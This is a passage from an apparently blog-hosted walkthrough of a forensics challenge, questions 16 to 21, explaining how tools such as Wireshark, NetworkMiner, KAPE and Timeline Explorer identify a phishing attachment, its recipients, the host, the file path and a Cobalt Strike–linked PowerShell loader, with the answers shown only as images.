srcset="https://substackcdn.com/image/fetch/$s_!Z0uP!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6f347a12-1da4-4bc3-b0ad-7ebc02573785_717x102.png 424w, https://substackcdn.com/image/fetch/$s_!Z0uP!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6f347a12-1da4-4bc3-b0ad-7ebc02573785_717x102.png 848w, https://substackcdn.com/image/fetch/$s_!Z0uP!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6f347a12-1da4-4bc3-b0ad-7ebc02573785_717x102.png 1272w, https://substackcdn.com/image/fetch/$s_!Z0uP!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6f347a12-1da4-4bc3-b0ad-7ebc02573785_717x102.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Z0uP!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6f347a12-1da4-4bc3-b0ad-7ebc02573785_717x102.png" width="717" height="102" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/6f347a12-1da4-4bc3-b0ad-7ebc02573785_717x102.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:102,&quot;width&quot;:717,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!Z0uP!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6f347a12-1da4-4bc3-b0ad-7ebc02573785_717x102.png 424w, https://substackcdn.com/image/fetch/$s_!Z0uP!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6f347a12-1da4-4bc3-b0ad-7ebc02573785_717x102.png 848w, https://substackcdn.com/image/fetch/$s_!Z0uP!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6f347a12-1da4-4bc3-b0ad-7ebc02573785_717x102.png 1272w, https://substackcdn.com/image/fetch/$s_!Z0uP!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6f347a12-1da4-4bc3-b0ad-7ebc02573785_717x102.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p><strong>16. What is the name of the malicious attachment?</strong></p><p>Using strings and grep for "attachment:" provides the malicious file name.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!8Yo1!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa1ff3ad3-3e81-4a47-871f-2cbc52426dc5_454x43.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!8Yo1!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa1ff3ad3-3e81-4a47-871f-2cbc52426dc5_454x43.png 424w, https://substackcdn.com/image/fetch/$s_!8Yo1!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa1ff3ad3-3e81-4a47-871f-2cbc52426dc5_454x43.png 848w, https://substackcdn.com/image/fetch/$s_!8Yo1!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa1ff3ad3-3e81-4a47-871f-2cbc52426dc5_454x43.png 1272w, https://substackcdn.com/image/fetch/$s_!8Yo1!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa1ff3ad3-3e81-4a47-871f-2cbc52426dc5_454x43.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!8Yo1!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa1ff3ad3-3e81-4a47-871f-2cbc52426dc5_454x43.png" width="454" height="43" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/a1ff3ad3-3e81-4a47-871f-2cbc52426dc5_454x43.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:43,&quot;width&quot;:454,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!8Yo1!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa1ff3ad3-3e81-4a47-871f-2cbc52426dc5_454x43.png 424w, https://substackcdn.com/image/fetch/$s_!8Yo1!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa1ff3ad3-3e81-4a47-871f-2cbc52426dc5_454x43.png 848w, https://substackcdn.com/image/fetch/$s_!8Yo1!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa1ff3ad3-3e81-4a47-871f-2cbc52426dc5_454x43.png 1272w, https://substackcdn.com/image/fetch/$s_!8Yo1!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa1ff3ad3-3e81-4a47-871f-2cbc52426dc5_454x43.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p><strong>17. Who are the CEOs that received the attachment?</strong></p><p>Filtering for "To:" and "From:" fields in extracted emails helps identify recipients.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!0Qta!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F88de657e-52ca-41d3-a3ee-19771ab214c8_327x129.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!0Qta!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F88de657e-52ca-41d3-a3ee-19771ab214c8_327x129.png 424w, https://substackcdn.com/image/fetch/$s_!0Qta!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F88de657e-52ca-41d3-a3ee-19771ab214c8_327x129.png 848w, https://substackcdn.com/image/fetch/$s_!0Qta!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F88de657e-52ca-41d3-a3ee-19771ab214c8_327x129.png 1272w, https://substackcdn.com/image/fetch/$s_!0Qta!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F88de657e-52ca-41d3-a3ee-19771ab214c8_327x129.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!0Qta!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F88de657e-52ca-41d3-a3ee-19771ab214c8_327x129.png" width="327" height="129" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/88de657e-52ca-41d3-a3ee-19771ab214c8_327x129.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:129,&quot;width&quot;:327,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!0Qta!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F88de657e-52ca-41d3-a3ee-19771ab214c8_327x129.png 424w, https://substackcdn.com/image/fetch/$s_!0Qta!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F88de657e-52ca-41d3-a3ee-19771ab214c8_327x129.png 848w, https://substackcdn.com/image/fetch/$s_!0Qta!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F88de657e-52ca-41d3-a3ee-19771ab214c8_327x129.png 1272w, https://substackcdn.com/image/fetch/$s_!0Qta!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F88de657e-52ca-41d3-a3ee-19771ab214c8_327x129.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p><strong>18. What is the hostname of the compromised CEO's device?</strong></p><p>NetworkMiner or Wireshark can reveal hostnames. Additional analysis of ConsoleLog files provides confirmation.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!OrYZ!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F28b0e6c8-f5a0-4e21-a43a-7be3fae3c6e7_1351x289.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!OrYZ!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F28b0e6c8-f5a0-4e21-a43a-7be3fae3c6e7_1351x289.png 424w, https://substackcdn.com/image/fetch/$s_!OrYZ!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F28b0e6c8-f5a0-4e21-a43a-7be3fae3c6e7_1351x289.png 848w, https://substackcdn.com/image/fetch/$s_!OrYZ!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F28b0e6c8-f5a0-4e21-a43a-7be3fae3c6e7_1351x289.png 1272w, https://substackcdn.com/image/fetch/$s_!OrYZ!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F28b0e6c8-f5a0-4e21-a43a-7be3fae3c6e7_1351x289.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!OrYZ!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F28b0e6c8-f5a0-4e21-a43a-7be3fae3c6e7_1351x289.png" width="1351" height="289" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/28b0e6c8-f5a0-4e21-a43a-7be3fae3c6e7_1351x289.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:289,&quot;width&quot;:1351,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!OrYZ!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F28b0e6c8-f5a0-4e21-a43a-7be3fae3c6e7_1351x289.png 424w, https://substackcdn.com/image/fetch/$s_!OrYZ!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F28b0e6c8-f5a0-4e21-a43a-7be3fae3c6e7_1351x289.png 848w, https://substackcdn.com/image/fetch/$s_!OrYZ!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F28b0e6c8-f5a0-4e21-a43a-7be3fae3c6e7_1351x289.png 1272w, https://substackcdn.com/image/fetch/$s_!OrYZ!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F28b0e6c8-f5a0-4e21-a43a-7be3fae3c6e7_1351x289.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p><strong>19. What is the full path for the malicious attachment?</strong></p><p>Using Timeline Explorer on KAPE&#8217;s MFT_Output.csv, we search for the attachment name to retrieve its full path.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!Fz9e!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F964935fc-1f5c-4937-9ca8-0f16e0e819b9_2480x748.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Fz9e!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F964935fc-1f5c-4937-9ca8-0f16e0e819b9_2480x748.png 424w, https://substackcdn.com/image/fetch/$s_!Fz9e!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F964935fc-1f5c-4937-9ca8-0f16e0e819b9_2480x748.png 848w, https://substackcdn.com/image/fetch/$s_!Fz9e!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F964935fc-1f5c-4937-9ca8-0f16e0e819b9_2480x748.png 1272w, https://substackcdn.com/image/fetch/$s_!Fz9e!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F964935fc-1f5c-4937-9ca8-0f16e0e819b9_2480x748.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Fz9e!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F964935fc-1f5c-4937-9ca8-0f16e0e819b9_2480x748.png" width="1456" height="439" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/964935fc-1f5c-4937-9ca8-0f16e0e819b9_2480x748.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:439,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!Fz9e!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F964935fc-1f5c-4937-9ca8-0f16e0e819b9_2480x748.png 424w, https://substackcdn.com/image/fetch/$s_!Fz9e!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F964935fc-1f5c-4937-9ca8-0f16e0e819b9_2480x748.png 848w, https://substackcdn.com/image/fetch/$s_!Fz9e!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F964935fc-1f5c-4937-9ca8-0f16e0e819b9_2480x748.png 1272w, https://substackcdn.com/image/fetch/$s_!Fz9e!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F964935fc-1f5c-4937-9ca8-0f16e0e819b9_2480x748.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>20. What command was used to gain initial access?</strong></p><p>Searching Timeline Explorer for powershell.exe or cmd.exe reveals the executed command granting access.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!ABLB!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3a2a37d6-745f-4031-900e-b11f6548c620_2544x196.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!ABLB!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3a2a37d6-745f-4031-900e-b11f6548c620_2544x196.png 424w, https://substackcdn.com/image/fetch/$s_!ABLB!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3a2a37d6-745f-4031-900e-b11f6548c620_2544x196.png 848w, https://substackcdn.com/image/fetch/$s_!ABLB!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3a2a37d6-745f-4031-900e-b11f6548c620_2544x196.png 1272w, https://substackcdn.com/image/fetch/$s_!ABLB!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3a2a37d6-745f-4031-900e-b11f6548c620_2544x196.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!ABLB!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3a2a37d6-745f-4031-900e-b11f6548c620_2544x196.png" width="1456" height="112" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/3a2a37d6-745f-4031-900e-b11f6548c620_2544x196.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:112,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!ABLB!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3a2a37d6-745f-4031-900e-b11f6548c620_2544x196.png 424w, https://substackcdn.com/image/fetch/$s_!ABLB!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3a2a37d6-745f-4031-900e-b11f6548c620_2544x196.png 848w, https://substackcdn.com/image/fetch/$s_!ABLB!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3a2a37d6-745f-4031-900e-b11f6548c620_2544x196.png 1272w, https://substackcdn.com/image/fetch/$s_!ABLB!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3a2a37d6-745f-4031-900e-b11f6548c620_2544x196.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p><strong>21. What is the threat label for the malicious executable used for initial access?</strong></p><p>Exporting the malicious file from Wireshark (File &gt; Export Object &gt; HTTP) and analyzing it reveals an obfuscated PowerShell script. Decoding it shows behavior linked to Cobalt Strike Beacon.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!0hKg!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2e4b8674-d8dc-4787-9df3-e1f61a8b2f7b_477x289.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!0hKg!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2e4b8674-d8dc-4787-9df3-e1f61a8b2f7b_477x289.png 424w, https://substackcdn.com/image/fetch/$s_!0hKg!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2e4b8674-d8dc-4787-9df3-e1f61a8b2f7b_477x289.png 848w, https://substackcdn.com/image/fetch/$s_!0hKg!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2e4b8674-d8dc-4787-9df3-e1f61a8b2f7b_477x289.png 1272w, https://substackcdn.com/image/fetch/$s_!0hKg!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2e4b8674-d8dc-4787-9df3-e1f61a8b2f7b_477x289.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!0hKg!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2e4b8674-d8dc-4787-9df3-e1f61a8b2f7b_477x289.png" width="477" height="289" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/2e4b8674-d8dc-4787-9df3-e1f61a8b2f7b_477x289.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:289,&quot;width&quot;:477,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:25620,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!0hKg!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2e4b8674-d8dc-4787-9df3-e1f61a8b2f7b_477x289.png 424w, https://substackcdn.com/image/fetch/$s_!0hKg!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2e4b8674-d8dc-4787-9df3-e1f61a8b2f7b_477x289.png 848w, https://substackcdn.com/image/fetch/$s_!0hKg!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2e4b8674-d8dc-4787-9df3-e1f61a8b2f7b_477x289.png 1272w, https://substackcdn.com/image/fetch/$s_!0hKg!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2e4b8674-d8dc-4787-9df3-e1f61a8b2f7b_477x289.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p></p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!ZQ3M!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdf02c0b1-c9af-4260-820c-24a7f3423185_1380x450.png" 